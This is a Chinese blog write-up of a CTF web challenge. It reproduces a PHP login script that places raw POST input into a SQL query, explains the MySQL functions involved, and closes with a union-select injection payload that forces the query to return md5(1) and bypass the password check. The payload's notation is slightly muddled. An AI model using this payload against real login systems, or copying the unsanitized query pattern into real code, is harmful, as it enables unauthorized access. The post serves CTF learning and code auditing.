实验吧--程序逻辑问题

最新推荐文章于 2021-03-09 19:22:33 发布
最新推荐文章于 2021-03-09 19:22:33 发布
阅读量206 收藏
点赞数
分类专栏: PHP代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/96176873
版权

看了一下实验吧的题,说是程序逻辑问题,一开始没找到源码,打开源码之后审计:

<html>
<head>
welcome to simplexue
</head>
<body>
<?php


if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("********, "*****", "********");
	mysql_select_db("phpformysql") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]); //对密码进行md5加密

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {  //如果相等返回0,!0就是1 pass指经过md5加密
	echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
	
  }
  
  
}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

函数解释:

1.mysql_connect

 mysqli_connect(host,username,password,dbname,port,socket);

打开或重复使用一个到 MySQL 服务器的连接。
如果成功则返回一个 MySQL 连接标识, 或者在失败时返回 FALSE。
在这里插入图片描述2.mysqli_select_db
mysqli_select_db() 函数用于更改连接的默认数据库。

 mysqli_select_db(connection,dbname);

如果成功则返回 TRUE,如果失败则返回 FALSE。
3.->是对象执行方法或取得属性用的,在这里是检测连接
4.mysql_query(query,connection)
在这里插入图片描述
mysql_query() 函数执行一条 MySQL 查询。
mysql_query() 仅对 SELECT,SHOW,EXPLAIN 或 DESCRIBE 语句返回一个资源标识符,如果查询执行不正确则返回 FALSE。
对于其它类型的 SQL 语句,mysql_query() 在执行成功时返回 TRUE,出错时返回 FALSE。
5.mysql_fetch_array()

mysql_fetch_array(data,array_type)

mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有
返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false。将数据以数字索引方式储存在数组中。

<?php
$con = mysql_connect("localhost", "hello", "321");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }

$db_selected = mysql_select_db("test_db",$con);
$sql = "SELECT * from Person WHERE Lastname='Adams'";
$result = mysql_query($sql,$con);
print_r(mysql_fetch_array($result));

mysql_close($con);
?>

Array
(
[0] => Adams
[LastName] => Adams
[1] => John
[FirstName] => John
[2] => London
[City] => London
)

6.strcasecmp()
比较两个字符串(不区分大小写)
在这里插入图片描述

构造payload:
select pw from php where user=’$user’

$user=a
a=-1’ union select md5(1)
此时 $pass就是md5(1)

$row = mysql_fetch_array($query, MYSQL_ASSOC)  
!strcasecmp($pass, $row[pw])  //$row[pw]就是select出来的md5(1)
暮秋初九
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
程序中的逻辑问题
huaye的专栏
12-12 2548
什么是程序中的逻辑问题?        所谓程序逻辑,一般认为是实现功能要求的上下文关系;包括代码的组织方式,算法,设计等方面。通常情况下它主要取决于详细设计的优劣;好的详细设计可以提供一个非常流畅的上下文关系。而程序员所做的工作,其实就是怎样组织好代码内部的逻辑关系。但是实际的情况是:我们的详细设计大多作不到这么详细,而且很多设计的工作甚至留给了开发人员自己去做;这种情况下,再加上项目时间紧,程
实验吧-web-程序逻辑问题
a3uRa的一个窝
08-29 383
源代码index.txt 发现源码 &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; welcome to simplexue &amp;lt;/head&amp;gt; &amp;lt;body&amp;gt; &amp;lt;?php if($_POST[user] &amp;amp;&amp;amp; $_POST[pass]) { $conn = mysql_conn
实验吧-程序逻辑问题
苟有恒,必有三更眠,五更起。
08-09 238
程序逻辑问题 原题链接 分析 查看源码有个index.txt &lt;?php if($_POST[user] &amp;&amp; $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") ...
php 面试程序逻辑问题,PHP面试之四:逻辑与算法
weixin_39521009的博客
03-09 97
数据结构常见数据结构Array 数组是 最简单 而且 应用最广泛 的数据结构特征:1、使用连续内存空间来存储2、存放相同类型或着衍生类型的元素(PHP数组比较特别,可以存放八种数据类型)3、通过下标来访问Set 集合特征:1、保存不重复的元素Map 字典特征:1、就是PHP关联数组,以Key/Value形式存储Stack 栈,与队列相似特征:1、存储数据是先进先出,栈只有一个出口,只能从栈顶部添加...
《计算机组成原理》实验报告---8位算术逻辑运算实验 - 副本 (2).zip
最新发布
06-21
文档“《计算机组成原理》实验报告---8位算术逻辑运算实验.docx”应包含了实验的具体步骤、观察结果、数据分析以及可能遇到的问题与解决方案。例如,可能会记录下各种运算实例的结果,分析溢出情况,以及通过逻辑...
Proteus 8 tec-8微程序控制器实验 单proteus源程序.zip
11-20
《Proteus 8 tec-8微程序控制器实验与单片机源程序解析》 在电子工程领域,Proteus 8是一款广受欢迎的虚拟原型设计工具,它为硬件工程师和软件开发者提供了一个集成的仿真环境,使得在硬件设计过程中可以进行实时的...
实验八-PLC修调与子程序调用综合实验.docx
12-14
通过这个实验,学生不仅可以深化对PLC编程和修调过程的理解,还能学习到如何通过子程序调用来组织复杂的控制逻辑,提高程序的可读性和维护性。 五、参考文献 实验指导中提到的《HNC-8系统PLC编程说明书》是进一步...
实验4 - 选择结构程序设计
02-28
实验4 - 选择结构程序设计】 实验4主要聚焦于C语言中的选择结构,这是程序设计中的关键元素,用于根据不同的条件执行不同的代码块。在C语言中,选择结构主要包含`if`语句和`switch`语句,它们允许程序员在运行时...
20151910042-刘鹏-C实验03-选择结构程序设计1
08-03
通过这样的实践,学生不仅能掌握基本的选择结构,还能深入理解C语言的控制流和逻辑判断,这对于后续的程序设计和问题解决至关重要。同时,实验也强调了程序可读性和调试的重要性,培养良好的编程习惯。
程序逻辑问题(CTF)
qq_22192367的博客
03-19 745
题目链接:http://ctf5.shiyanbar.com/web/5/index.php 有提示是绕过,打开题目,可以看到是个登陆问题,尝试抓包修改source值没什么效果 于是尝试查看源代码发现index.txt链接,打开发现是php后台代码,看来是个代码审计问题 代码大意:判断输入是否为空;将pass值进行md5加密后赋给pass变量;从php数据库中查询user用户的p...
实验吧——WEB-程序逻辑问题
迷风小白
04-12 2798
程序逻辑问题 直接查看网页源代码 <html> <head> welcome to simplexue </head> <body> <br /> <b>Notice</b>: Use of undefined constant user - assumed 'user' in <b>C:\h43a...
非常经典的JAVA编程题全集
Java生涯
12-04 5422
 【程序1】 题目:古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少? 1.程序分析: 兔子的规律为数列1,1,2,3,5,8,13,21.... 【程序2】 题目:判断101-200之间有多少个素数,并输出所有素数。 1.程序分析:判断素数的方法:用一个数分别去除2到sqrt(这个数),如果能被整除,
【慕课笔记】PHP与MySQL关系大揭秘
全名工作狂的小城堡
10-21 504
3-3 mysql_fetch_row与mysql_fetch_array的区别: 1、mysql_fetch_row取一条数据产生一个索引数组 2、mysql_fetch_array默认状态下取一条数据产生一个索引数组和一个关联数组 $arr=mysql_fetch_row($query); echo $arr['name']; /* mysql_fetch_array的第二
WEB CTF 西普学院
ztaos的博客
11-26 4464
菊花        http://ctf1.simplexue.com/web/6/   提示:  Please make sure you have installed .net framework 9.9!     用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下
实验吧-程序逻辑问题writeup
一个安全研究员
08-27 9457
1.      程序逻辑问题   题目提示是程序逻辑问题,那一定涉及到源码审计嘛,F12查看网页源代码:       这儿不就藏着源码吗,构造URL访问index.txt的如下源码: &lt;html&gt; &lt;head&gt; welcome to simplexue &lt;/head&gt; &lt;body&gt; &lt;?php     if($_P...
$sql=mysql_query(_PHP mysql_query() 函数
weixin_29281915的博客
01-25 393
定义和用法mysql_query() 函数执行一条 MySQL 查询。语法mysql_query(query,connection)参数描述query必需。规定要发送的 SQL 查询。注释:查询字符串不应以分号结束。connection可选。规定 SQL 连接标识符。如果未规定,则使用上一个打开的连接。说明如果没有打开的连接,本函数会尝试无参数调用 mysql_connect() 函数来建立一个连...
mysql_query()函数的返回值问题
热门推荐
liuzp111的专栏
06-17 1万+
问题描述: 我在操作mysql,插入数据
mysql_query的坑
h3110n3w0r1d
10-20 5846
今天非常坑,就用写博客来发泄吧。。。 &lt;html&gt; &lt;form action="./sql.php" method="get"&gt; 账号&lt;input type = "text" name = "u"&gt;&lt;br&gt; 密码&lt;input type = "text" name = "p
实验7-微程序控制器实验
06-18
实验7-微程序控制器实验通常是在计算机体系结构或嵌入式系统课程中的一部分,它涉及到对微程序设计和控制原理的实际操作。微程序控制器是一种使用微程序来执行指令的处理器架构,它将复杂的操作分解成一系列简单的微...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值